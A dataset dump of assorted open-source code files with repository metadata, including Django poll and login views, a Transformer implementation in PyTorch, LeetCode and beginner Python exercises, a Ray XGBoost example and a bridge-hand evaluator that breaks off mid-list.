blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b17f118b3a48f23411c0605dccbd4d3d7d5ac331 | c75ec82316ed5322c5844912ce9c528c24360b9f | /nsd1903/devweb/day03/mysite/polls/views.py | 34549e6b8acdfc67276252944f7264401ca3a21a | [] | no_license | MrZhangzhg/nsd2019 | a94cde22f2e4bd648bb9e56ca63827f558f3c083 | 54f6d2c7b348a69f13ad5f38f2fbdc8207528749 | refs/heads/master | 2021-08-22T17:38:27.697675 | 2020-02-22T08:36:21 | 2020-02-22T08:36:21 | 183,539,489 | 21 | 24 | null | 2020-05-17T12:07:55 | 2019-04-26T02:06:16 | HTML | UTF-8 | Python | false | false | 1,327 | py | from django.shortcuts import render, redirect
from .models import Question
# Create your views here.
def index(request):
    """Render the front page listing every question, newest first.

    Django passes the HTTP request as the first positional argument.
    """
    question_list = Question.objects.order_by('-pub_date')
    return render(request, 'index.html', {'questions': question_list})
def detail(request, question_id):
    """Render the detail page for the question with the given primary key."""
    selected = Question.objects.get(id=question_id)
    return render(request, 'detail.html', {'question': selected})
def vote(request, question_id):
    """Register one vote for the submitted choice, then redirect to results."""
    question = Question.objects.get(id=question_id)
    # request.POST holds the submitted form data.
    selected_id = request.POST.get('choice_id')
    # Resolve the choice through the question's related set.
    choice = question.choice_set.get(id=selected_id)
    choice.votes = choice.votes + 1  # tally the vote
    choice.save()
    # Redirect so the browser ends up on the result URL; rendering directly
    # would leave the /vote/ URL in the address bar with the result page body.
    return redirect('result', question_id)
def result(request, question_id):
    """Render the results page for the question with the given primary key."""
    return render(request, 'result.html',
                  {'question': Question.objects.get(id=question_id)})
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
e13ae8c45049850fbfbfea34c7cd6ba0fef4b00a | 86d464653092d40abdbd2a125cb29af4de6ca44c | /experiment_scripts/inverted_indexing_test.py | be874046001a92303bd48125366d31b2f0190f11 | [] | no_license | lws803/CS3245 | ad6003729ead0bf871e131ca0c74676001a66f6a | b4c85388bb017fb21a4ccee14096230aeccecde9 | refs/heads/master | 2020-04-19T03:26:12.737752 | 2019-06-16T16:02:12 | 2019-06-16T16:02:12 | 167,934,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | from nltk.stem import *
from nltk.probability import FreqDist
import nltk
def build_index(texts, stemmer):
    """Build an inverted index mapping each stemmed term to its posting list.

    Posting lists are sorted lists of document ids (list positions in *texts*).
    """
    index = {}
    for doc_id, text in enumerate(texts):
        for token in nltk.word_tokenize(text):
            term = stemmer.stem(token)  # normalize before indexing
            postings = index.setdefault(term, [])
            # Doc ids arrive in increasing order, so checking the tail of the
            # posting list is enough to avoid duplicates.
            if not postings or postings[-1] != doc_id:
                postings.append(doc_id)
    return index


def intersect(a, b):
    """Return doc ids present in both sorted posting lists (boolean AND)."""
    result = []
    i = j = 0
    while i < len(a) and j < len(b):
        if a[i] < b[j]:
            i += 1
        elif b[j] < a[i]:
            j += 1
        else:
            result.append(a[i])
            i += 1
            j += 1
    return result


def difference(a, b):
    """Return doc ids in *a* but not in *b* (boolean AND NOT).

    Fixes the original merge, which dropped any ids of *a* remaining after
    *b* was exhausted, and needlessly popped already-confirmed matches.
    """
    result = []
    i = j = 0
    while i < len(a) and j < len(b):
        if a[i] < b[j]:
            # a[i] cannot appear later in b (both lists are sorted), so keep it.
            result.append(a[i])
            i += 1
        elif a[i] > b[j]:
            j += 1
        else:  # a[i] == b[j]: excluded by b
            i += 1
            j += 1
    # Everything left in a can no longer be matched by b.
    result.extend(a[i:])
    return result


if __name__ == '__main__':
    stemmer = PorterStemmer()
    # The Porter stemmer strips -ed / -s etc., so "penyetted" -> "penyet".
    texts = ["penyetted penyet", "penyet test helloed", "penyetted hello"]
    dictionary = build_index(texts, stemmer)
    for term in dictionary:
        print(term, " ", dictionary[term])

    # Sort the two query terms by document frequency so the rarer term is
    # processed first, as a real query optimizer would.
    query1 = stemmer.stem("penyet")
    query2 = stemmer.stem("hello")
    queries = sorted([(len(dictionary[q]), q) for q in (query1, query2)])

    # Texts containing both terms.
    print(intersect(dictionary[queries[0][1]], dictionary[queries[1][1]]))

    # Texts containing "penyet" but not "hello".
    print(difference(dictionary["penyet"], dictionary["hello"]))
| [
"lws803@gmail.com"
] | lws803@gmail.com |
5f246ef3eb4100549c48eb0f4832a833d1d6a4ed | e6cce25fb4159112d5a395a63aa024ac409b40d2 | /CHALLENGES/100TASK/ex010.py | 1c683bf8551b6a15bd8a3464c23792719ddae1e6 | [] | no_license | batestin1/PYTHON | 729225e6f1db029ec1e725eced5fe89e884cccb4 | f7fb74dd755acf37920dee6a6f9e3663141232e9 | refs/heads/master | 2023-06-23T03:27:14.951229 | 2021-07-22T22:54:20 | 2021-07-22T22:54:20 | 370,337,387 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
import pandas
# Read an amount in BRL from the user and show how many US dollars it buys.
banner = '-*-' * 30
print(banner)
print('CONVERSAO DE DOLAR ')
print('Desenvolvido por Maycon Cypriano')
print(banner)
real = float(input('Quanto você tem na carteira: '))
dolar = real * 0.18  # fixed BRL -> USD rate used by the exercise
print(f'Se você tem R$:{real} na carteira, então você tem USD:{round(dolar,2)}')
"mayconcipriano@gmail.com"
] | mayconcipriano@gmail.com |
882890653845d4203f7dbc442a563c4f17cbf708 | 19ca5093877d00b1cffcd0ec5c37e27ba2ceb347 | /lesson_03/task_2.py | a99b497abf4470a16621a728f53564a9eef35989 | [] | no_license | MichaelDc86/Algorythms | 10d424fb1bc667d088ecb7f8f01bf889ba2b6b22 | 072685eb045f0a29cc3abb7c008ef5677a7e5690 | refs/heads/master | 2020-05-15T23:57:41.608736 | 2019-05-29T06:39:35 | 2019-05-29T06:39:35 | 182,566,590 | 0 | 0 | null | 2019-05-29T06:39:36 | 2019-04-21T18:07:42 | Python | UTF-8 | Python | false | false | 943 | py | # Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2,
# второй массив надо заполнить значениями 1, 4, 5, 6 (или 0, 3, 4, 5, если индексация начинается с нуля),
# т.к. именно в этих позициях первого массива стоят четные числа.
import random
# Build a random-length array of random ints, then collect the (0-based)
# indexes of its even elements into a second array.
first = [random.randint(-99, 99) for _ in range(0, random.randint(1, 30))]
second = [position for position, value in enumerate(first) if value % 2 == 0]
print(f'Первый массив случайных чисел: {first}')
print(f'Второй массив, содержащий индексы четных элементов первого(нумерация с "0"): {second}')
| [
"lenskymiwa@ya.ru"
] | lenskymiwa@ya.ru |
113e7e10a6f4f6f4126931c451a7af984bdf89c7 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /875.koko-eating-bananas.python3.py | 67a20e8d792a6529bc38998bc86ee2ac85df6a73 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | #
# [907] Koko Eating Bananas
#
# https://leetcode.com/problems/koko-eating-bananas/description/
#
# algorithms
# Medium (42.86%)
# Total Accepted: 7.6K
# Total Submissions: 17.7K
# Testcase Example: '[3,6,7,11]\n8'
#
# Koko loves to eat bananas. There are N piles of bananas, the i-th pile has
# piles[i] bananas. The guards have gone and will come back in H hours.
#
# Koko can decide her bananas-per-hour eating speed of K. Each hour, she
# chooses some pile of bananas, and eats K bananas from that pile. If the pile
# has less than K bananas, she eats all of them instead, and won't eat any more
# bananas during this hour.
#
# Koko likes to eat slowly, but still wants to finish eating all the bananas
# before the guards come back.
#
# Return the minimum integer K such that she can eat all the bananas within H
# hours.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: piles = [3,6,7,11], H = 8
# Output: 4
#
#
#
# Example 2:
#
#
# Input: piles = [30,11,23,4,20], H = 5
# Output: 30
#
#
#
# Example 3:
#
#
# Input: piles = [30,11,23,4,20], H = 6
# Output: 23
#
#
#
#
# Note:
#
#
# 1 <= piles.length <= 10^4
# piles.length <= H <= 10^9
# 1 <= piles[i] <= 10^9
#
#
#
#
#
#
class Solution:
    def minEatingSpeed(self, piles, H):
        """
        Return the minimum integer eating speed K such that all piles can be
        finished within H hours (at most one pile is eaten from per hour).

        Binary-search the answer: the predicate "can finish at speed k" is
        monotone in k, so the smallest feasible k is found in
        O(len(piles) * log(max(piles))) time.

        :type piles: List[int]
        :type H: int
        :rtype: int
        """
        lo, hi = 1, max(piles)
        while lo < hi:
            mid = (lo + hi) // 2
            # Hours needed at speed mid: ceil(p / mid) summed over the piles.
            hours = sum((p + mid - 1) // mid for p in piles)
            if hours <= H:
                hi = mid  # mid is fast enough; try something slower
            else:
                lo = mid + 1  # too slow; must eat faster
        return lo
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
493992116f031f81f5b2f85c82bed18c7a906557 | 1a87ac9522591f25b03e6912ba3af3cca115abae | /authentication/views.py | babc97856be2925196aacd612175b88e59fbc097 | [
"MIT"
] | permissive | jyywong/InventoryMS | c67fdb0a051be5d136d9509e63b7fc0aeadcc324 | 9aac1324742730ce980e638f2156ece9eb44a593 | refs/heads/master | 2023-04-01T15:38:44.448813 | 2021-04-05T19:59:45 | 2021-04-05T19:59:45 | 350,162,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
def login_view(request):
    """Render the login form; on POST, authenticate and start a session."""
    form = LoginForm(request.POST or None)
    msg = None

    if request.method == "POST":
        if not form.is_valid():
            msg = 'Error validating the form'
        else:
            user = authenticate(
                username=form.cleaned_data.get("username"),
                password=form.cleaned_data.get("password"),
            )
            if user is not None:
                login(request, user)
                return redirect("lab_list")
            # authenticate() returned None: bad username/password pair.
            msg = 'Invalid credentials'

    return render(request, "accounts/login.html", {"form": form, "msg" : msg})
def register_user(request):
    """Render the sign-up form; on POST, create the account and report status."""
    msg = None
    success = False

    if request.method != "POST":
        form = SignUpForm()
    else:
        form = SignUpForm(request.POST)
        if not form.is_valid():
            msg = 'Form is not valid'
        else:
            form.save()
            username = form.cleaned_data.get("username")
            raw_password = form.cleaned_data.get("password1")
            # Verify the freshly-created credentials authenticate cleanly.
            user = authenticate(username=username, password=raw_password)
            msg = 'User created - please <a href="/login">login</a>.'
            success = True
            #return redirect("/login/")

    return render(request, "accounts/register.html", {"form": form, "msg" : msg, "success" : success })
| [
"wong.jonathan1@gmail.com"
] | wong.jonathan1@gmail.com |
d7a27c6b64dc08597f96d3ab27d59a95797a6e40 | 47bd686ab04d8f6daba2097875dfefdba967d598 | /10_codeup/01_기초100제/01_1001.py | 4d64434c3fa4a6f2364f3dba450a59a5dc52733b | [] | no_license | EmjayAhn/DailyAlgorithm | 9633638c7cb7064baf26126cbabafd658fec3ca8 | acda1917fa1a290fe740e1bccb237d83b00d1ea4 | refs/heads/master | 2023-02-16T17:04:35.245512 | 2023-02-08T16:29:51 | 2023-02-08T16:29:51 | 165,942,743 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | # https://codeup.kr/problem.php?id=1001
print('Hello')  # expected output for CodeUp basic problem 1001
"emjay.data@gmail.com"
] | emjay.data@gmail.com |
40295ccd9ae060f231a5bedae45d9838221b52a3 | 01431aec3d6084b77faa62eae962c3a5ce07621a | /attention_is_all_you_need.py | 55b5443194eae9da8406c6123bbfa512c29aff15 | [] | no_license | jiyali/python-target-offer | e952cc77b0b3c4e4c77f5b9f67ef61bd7413354c | 214176b25caffea647f87bf816d3d712293c7c7f | refs/heads/master | 2020-07-29T05:53:57.930631 | 2020-05-13T15:04:08 | 2020-05-13T15:04:08 | 209,690,069 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,112 | py | # #############input Embedding ###############
class Embeddings(nn.Module):
    """Token-embedding lookup scaled by sqrt(d_model), as in the Transformer."""

    def __init__(self, d_model, vocab):
        super(Embeddings, self).__init__()
        self.lut = nn.Embedding(vocab, d_model)
        self.d_model = d_model  # embedding dimension

    def forward(self, x):
        # Scale the looked-up vectors so their magnitude matches the
        # positional encodings that are added to them.
        scale = math.sqrt(self.d_model)
        return self.lut(x) * scale
# #############Positional Encoding############
class PositionalEncoding(nn.Module):
    """Inject position information via fixed sine/cosine positional encodings."""
    def __init__(self, d_model, dropout, max_len=5000):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        pe = torch.zeros(max_len, d_model)
        position = torch.arange(0., max_len).unsqueeze(1)
        # Geometric progression of inverse wavelengths over the even dims.
        div_term = torch.exp(torch.arange(0., d_model, 2) *
                             -(math.log(10000.0) / d_model))
        pe[:, 0::2] = torch.sin(position * div_term)  # even columns
        pe[:, 1::2] = torch.cos(position * div_term)  # odd columns
        pe = pe.unsqueeze(0)  # [1, max_len, d_model]
        # Buffer: saved with the model's state but not a trainable parameter.
        self.register_buffer('pe', pe)
    def forward(self, x):
        # The tensor fed onward is the word embedding plus the positional
        # encoding, truncated to the input sequence length x.size(1).
        x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)
        return self.dropout(x)
# Demo plot of the positional encoding: each dimension is a sinusoid over
# position with a different frequency and phase offset.
plt.figure(figsize=(15, 5))
pe = PositionalEncoding(20, 0)
y = pe.forward(Variable(torch.zeros(1, 100, 20)))
plt.plot(np.arange(100), y[0, :, 4:8].data.numpy())  # plot dims 4..7 only
plt.legend(["dim %d"%p for p in [4,5,6,7]])
# ###########MultiHeadAttention#################
class MultiHeadedAttention(nn.Module):
    def __init__(self, h, d_model, dropout=0.1):
        "Take in model size and number of heads."
        super(MultiHeadedAttention, self).__init__()
        assert d_model % h == 0  # d_model must split evenly across heads
        self.d_k = d_model // h  # per-head dimension
        self.h = h
        # Four projections: one each for query, key, value, plus the output.
        self.linears = clones(nn.Linear(d_model, d_model), 4)
        self.attn = None  # holds the most recent attention weights
        self.dropout = nn.Dropout(p=dropout)
    def forward(self, query, key, value, mask=None):
        """
        Multi-headed attention.
        Inputs q, k, v have shape [batch, L, d_model];
        the output x has the same shape.
        """
        if mask is not None:
            # Same mask applied to all h heads.
            mask = mask.unsqueeze(1)
        nbatches = query.size(0)
        # 1) Project q/k/v and split heads: [batch, L, d_model] -> [batch, h, L, d_model/h]
        query, key, value = \
            [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
             for l, x in zip(self.linears, (query, key, value))]
        # 2) Scaled dot-product attention (attention() is defined elsewhere in
        #    this module): x:[b, h, L, d_model/h], attn:[b, h, L, L]
        x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)
        # 3) Merge the heads back into the original sequence shape.
        x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)
        # Final output projection.
        return self.linears[-1](x)
# ################Add&Norm#################
class LayerNorm(nn.Module):
    """Layer normalization with learnable gain (a_2) and bias (b_2)."""

    def __init__(self, features, eps=1e-6):
        super(LayerNorm, self).__init__()
        self.a_2 = nn.Parameter(torch.ones(features))
        self.b_2 = nn.Parameter(torch.zeros(features))
        self.eps = eps

    def forward(self, x):
        """Normalize the last dimension, then rescale and shift."""
        mu = x.mean(-1, keepdim=True)
        sigma = x.std(-1, keepdim=True)
        normalized = (x - mu) / (sigma + self.eps)
        return self.a_2 * normalized + self.b_2
class SublayerConnection(nn.Module):
    """Pre-norm residual wrapper: x + dropout(sublayer(norm(x)))."""

    def __init__(self, size, dropout):
        super(SublayerConnection, self).__init__()
        self.norm = LayerNorm(size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x, sublayer):
        """Apply *sublayer* to the normalized input and add the residual."""
        residual = x
        out = sublayer(self.norm(x))
        return residual + self.dropout(out)
# #############Feed-Forword Network###########
class PositionwiseFeedForward(nn.Module):
    """Position-wise FFN: Linear(d_model->d_ff) -> ReLU -> dropout -> Linear(d_ff->d_model)."""

    def __init__(self, d_model, d_ff, dropout=0.1):
        super(PositionwiseFeedForward, self).__init__()
        self.w_1 = nn.Linear(d_model, d_ff)
        self.w_2 = nn.Linear(d_ff, d_model)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        hidden = F.relu(self.w_1(x))
        return self.w_2(self.dropout(hidden))
# ##########Encoder主架构的代码##############
def clones(module, N):
    """Return a ModuleList holding N independent deep copies of *module*."""
    return nn.ModuleList(copy.deepcopy(module) for _ in range(N))
class Encoder(nn.Module):
    """A stack of N identical encoder layers followed by a final LayerNorm."""

    def __init__(self, layer, N):
        super(Encoder, self).__init__()
        self.layers = clones(layer, N)
        self.norm = LayerNorm(layer.size)

    def forward(self, x, mask):
        """Pass the input (and mask) through each layer in turn, then normalize."""
        out = x
        for encoder_layer in self.layers:
            out = encoder_layer(out, mask)
        return self.norm(out)
# ############Decoder的代码主要结构##############
# Decoder部分
class Decoder(nn.Module):
    """Generic N-layer decoder stack with masking, ending in a LayerNorm."""

    def __init__(self, layer, N):
        super(Decoder, self).__init__()
        self.layers = clones(layer, N)
        self.norm = LayerNorm(layer.size)

    def forward(self, x, memory, src_mask, tgt_mask):
        out = x
        for decoder_layer in self.layers:
            out = decoder_layer(out, memory, src_mask, tgt_mask)
        return self.norm(out)
# ################mask#####################
def subsequent_mask(size):
    """Return a [1, size, size] boolean mask that is True on and below the diagonal.

    Row i is True for columns 0..i, so each position may attend to itself and
    to earlier positions only (no peeking at the future).
    """
    allowed = torch.tril(torch.ones(1, size, size, dtype=torch.uint8))
    return allowed == 1
# ##########Encoder-Decoder Multi-head Attention###################
class DecoderLayer(nn.Module):
    """One decoder block: masked self-attention, encoder attention, feed-forward."""

    def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
        super(DecoderLayer, self).__init__()
        self.size = size
        self.self_attn = self_attn
        self.src_attn = src_attn
        self.feed_forward = feed_forward
        self.sublayer = clones(SublayerConnection(size, dropout), 3)

    def forward(self, x, memory, src_mask, tgt_mask):
        """Run the three sublayers in sequence, each wrapped in its residual."""
        x = self.sublayer[0](x, lambda t: self.self_attn(t, t, t, tgt_mask))
        x = self.sublayer[1](x, lambda t: self.src_attn(t, memory, memory, src_mask))
        return self.sublayer[2](x, self.feed_forward)
# #########Linear and Softmax to Produce Output Probabilities############
class Generator(nn.Module):
    """Final generation step: linear projection to vocab size + log-softmax."""

    def __init__(self, d_model, vocab):
        super(Generator, self).__init__()
        self.proj = nn.Linear(d_model, vocab)

    def forward(self, x):
        logits = self.proj(x)
        return F.log_softmax(logits, dim=-1)
"762115542@qq.com"
] | 762115542@qq.com |
e5d3bbcfe8a0f176cd05149a1ff34ab74cc535cf | e0980f704a573894350e285f66f4cf390837238e | /.history/flex/models_20201030102256.py | 24833cc279761223d63ee1229f3fb82f233a9c19 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,537 | py | from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import StreamFieldPanel
from wagtail.snippets.blocks import SnippetChooserBlock
from wagtail.images.blocks import ImageChooserBlock
from wagtail.core import blocks as wagtail_blocks
from streams import blocks
from home.models import new_table_options
class FlexPage(Page):
parent_page_type = ["home.H"]
body = StreamField([
('title', blocks.TitleBlock()),
('cards', blocks.CardsBlock()),
('image_and_text', blocks.ImageAndTextBlock()),
('cta', blocks.CallToActionBlock()),
('testimonial', SnippetChooserBlock(
target_model='testimonials.Testimonial',
template = 'streams/testimonial_block.html'
)),
('pricing_table', blocks.PricingTableBlock(
table_options=new_table_options,
)),
('richtext', wagtail_blocks.RichTextBlock(
template = 'streams/simple_richtext_block.html',
features = ['bold', 'italic', 'ol', 'ul', 'link']
)),
('large_image', ImageChooserBlock(
help_text = 'Ten obraz będzie przycięty do 1200px na 775px',
template='streams/large_image_block.html'
))
], null=True, blank=True)
content_panels = Page.content_panels + [
StreamFieldPanel('body'),
]
class Meta:
verbose_name = 'Flex (misc) page'
verbose_name_plural = 'Flex (misc) pages' | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
e2f4b4e6ea3c3f336a0d95eb369d269665bf9fb9 | b3699724907850fd26cbce4509fec83a33b89760 | /python/ray/util/xgboost/simple_example.py | f8881e75d0f5f6391b2239475889122141e005b5 | [
"Apache-2.0",
"MIT"
] | permissive | BonsaiAI/ray | 5e2f26a81d865a795261d11f9182aca7f07c7b97 | 941d30f082fe879ea30618af14327c25b5a21a74 | refs/heads/master | 2023-06-12T05:15:29.370188 | 2021-05-06T07:03:53 | 2021-05-06T07:03:53 | 233,708,687 | 3 | 5 | Apache-2.0 | 2023-05-27T08:06:37 | 2020-01-13T22:41:47 | Python | UTF-8 | Python | false | false | 1,114 | py | from sklearn import datasets
from sklearn.model_selection import train_test_split
from ray.util.xgboost import RayDMatrix, RayParams, train
# __xgboost_begin__
def main():
# Load dataset
data, labels = datasets.load_breast_cancer(return_X_y=True)
# Split into train and test set
train_x, test_x, train_y, test_y = train_test_split(
data, labels, test_size=0.25)
train_set = RayDMatrix(train_x, train_y)
test_set = RayDMatrix(test_x, test_y)
# Set config
config = {
"tree_method": "approx",
"objective": "binary:logistic",
"eval_metric": ["logloss", "error"],
"max_depth": 3,
}
evals_result = {}
# Train the classifier
bst = train(
config,
train_set,
evals=[(test_set, "eval")],
evals_result=evals_result,
ray_params=RayParams(max_actor_restarts=1, num_actors=1),
verbose_eval=False)
bst.save_model("simple.xgb")
print("Final validation error: {:.4f}".format(
evals_result["eval"]["error"][-1]))
# __xgboost_end__
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | BonsaiAI.noreply@github.com |
df9cff14fdbf62a866cf77be1ff6d7b3f37cd1d0 | 236498cd8daf971ef53cd120051d76c72474330d | /fetch-gazettes.py | 4e65868eecf60ad83be066f8f9e8b4c0e60b7522 | [] | no_license | OpenUpSA/saflii-gazettes | 2106130e1e0dac45a630f4e26f583c56879bc9f2 | 12d25bf00c47d6f9e4d3950e0ef2373bd17c5589 | refs/heads/master | 2021-10-23T21:53:06.583034 | 2019-03-20T08:54:54 | 2019-03-20T08:54:54 | 81,817,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python
#
# Script to generate Registry.txt and pdf-urls.txt for gazettes from opengazettes.org.za
# (Python 2 script: print statements; reads/writes files in the working directory.)
import json
import os
import os.path
entries = []  # human-readable registry lines, one per gazette
urls = []  # archive download URLs, one per gazette
# what jurisdiction code should we use?
with open("jurisdiction.txt") as f:
    jurisdiction = f.read().strip()
print "Only using gazettes for jurisdiction code: %s" % jurisdiction
# generate an entry for each gazette entry
# Input is JSON Lines: one gazette record per line.
with open("gazette-index-latest.jsonlines", "r") as f:
    for line in f:
        gazette = json.loads(line)
        if gazette['jurisdiction_code'] != jurisdiction:
            continue  # skip gazettes from other jurisdictions
        fname = os.path.basename(gazette['archive_url'])
        urls.append(gazette['archive_url'])
        entries.append('"%s" (%s) %s' % (fname, gazette['publication_date'], gazette['issue_title']))
# write the new registry
with open("Registry.txt.new", "w") as f:
    f.write("\n".join(entries))
# write the new urls
with open("pdf-urls.txt.new", "w") as f:
    f.write("\n".join(urls))
# atomically rename the files
# (rename is atomic on POSIX, so readers never see a half-written file)
os.rename("Registry.txt.new", "Registry.txt")
os.rename("pdf-urls.txt.new", "pdf-urls.txt")
| [
"greg@kempe.net"
] | greg@kempe.net |
71fa9d5981516b87f29091fb9f9f3d80fb0b2f7b | 5dbb41859b177778b124d9f9ca5828ca8a5c529e | /aula10.py | e2d96a78cc4c84dc93ff526ed17ee6e25fbbf947 | [] | no_license | hevalenc/Curso_DIO_Python_basico | 4d7163a7496d17ec248472b075bfbb0988412d26 | 59a1e2aabc98f7bc3db49eea16170974fd75e9a3 | refs/heads/main | 2023-03-21T05:29:37.847492 | 2021-03-18T16:25:22 | 2021-03-18T16:25:22 | 349,142,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | #o 'datetime' é uma biblioteca do python, o comando 'strftime' serve para usar a biblioteca de data e hora
#'%d/%m/%y' e '%A %B %Y' são diretivas para definir o formato de exibição de data
#'%H:%M:%S' diretiva para horas,
from datetime import date, time, datetime, timedelta
def trabalhando_com_datetime():
    """Demonstrate datetime: now(), strftime/strptime and timedelta arithmetic."""
    now = datetime.now()
    print(now)
    # '%d/%m/%Y %H:%M:%S' and '%c' are strftime format directives.
    print(now.strftime('%d/%m/%Y %H:%M:%S'))
    print(now.strftime('%c'))
    print(now.day)
    print(now.weekday())
    # weekday() is 0..6 (Monday..Sunday), used here to index the day names.
    weekdays = ('segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sábado', 'domingo')
    print(weekdays[now.weekday()])
    created = datetime(2018, 6, 20, 15, 30, 20)
    print(created.strftime('%c'))
    # strptime parses a string back into a datetime using the same directives.
    parsed = datetime.strptime('01/01/2019 12:20:22', '%d/%m/%Y %H:%M:%S')
    print(parsed)
    shift = timedelta(days=365, hours=2)
    print(parsed - shift)
    print(parsed + shift)
def trabalhando_com_date():
    """Demonstrate date.today() and strftime formatting (prints types and values)."""
    today = date.today()
    formatted = today.strftime('%A %B %Y')
    print(type(today))
    print(formatted)
    print(type(formatted))
def trabalhando_com_time():
    """Build a fixed time of day and print it raw and strftime-formatted."""
    moment = time(hour=15, minute=18, second=30)
    print(moment)
    print(moment.strftime('%H:%M:%S'))
if __name__ == '__main__':
    # Run all three demos when executed as a script.
    trabalhando_com_date()
    trabalhando_com_time()
    trabalhando_com_datetime()
| [
"heitorvalenca7@gmail.com"
] | heitorvalenca7@gmail.com |
63b17fc4261dad20778c5a4e48aa81f3868daa44 | fcdce57c1bd0cc4f52679fd0f3f82532550083fa | /282/bridgehand.py | 9b5c320bf36248545d8ba244453ecaab726c4014 | [] | no_license | nishanthegde/bitesofpy | a16a8b5fb99ab18dc1566e606170464a4df3ace0 | c28aa88e1366ab65f031695959d7cd0b3d08be6b | refs/heads/master | 2023-08-08T16:53:17.107905 | 2023-07-22T19:07:51 | 2023-07-22T19:07:51 | 183,959,400 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,209 | py | from enum import Enum
import typing
from dataclasses import dataclass, field
from collections import namedtuple, defaultdict
from collections.abc import Sequence
import random
from typing import List
from random import shuffle
# Suit and rank symbols in descending bridge order.
suits = ["S", "H", "D", "C"]
ranks = ["A", "K", "Q", "J", "T", "9", "8", "7", "6", "5", "4", "3", "2"]
# Enum members are auto-numbered 1..n in declaration order, so a smaller
# .value means a higher-priority suit/rank (S before C, A before 2).
Suit = Enum("Suit", suits)
Rank = Enum("Rank", ranks)
Card = namedtuple("Card", ["suit", "rank"])
# High-card points for the four honour cards (A=4, K=3, Q=2, J=1).
HCP = dict(zip((Rank.A, Rank.K, Rank.Q, Rank.J), (4, 3, 2, 1)))
# cards held in a suit -> short suit points (doubleton/singleton/void).
SSP = {count: 3 - count for count in (2, 1, 0)}
@dataclass
class TestHand:
    """Expected evaluation results for one bridge hand, keyed by its card string."""
    card_string: str
    doubletons: int
    singletons: int
    voids: int
    hcp: int
    ssp: int
    total_points: int
    ltc: int
    card_list: List[Card] = field(init=False)

    def __post_init__(self):
        """Expand card_string (e.g. "S:AKJ H:QJT9 ...") into shuffled Card objects."""
        cards = []
        for holding in self.card_string.split():
            suit = Suit[holding[0]]
            cards.extend(Card(suit, Rank[r]) for r in holding[2:])
        shuffle(cards)
        self.card_list = cards
# Reference hands with their expected evaluation results, in field order:
# (card_string, doubletons, singletons, voids, hcp, ssp, total_points, ltc).
test_hands = [
    TestHand("S:AKJ H:QJT9 D:5432 C:AK", 1, 0, 0, 18, 1, 19, 6),
    TestHand("S:A76 H:KT75 D:KQ2 C:AK8", 0, 0, 0, 19, 0, 19, 6),
    TestHand("S:AKQJT98765432", 0, 0, 3, 10, 9, 19, 0),
    TestHand("S:5432 H:5432 D:543 C:32", 1, 0, 0, 0, 1, 1, 11),
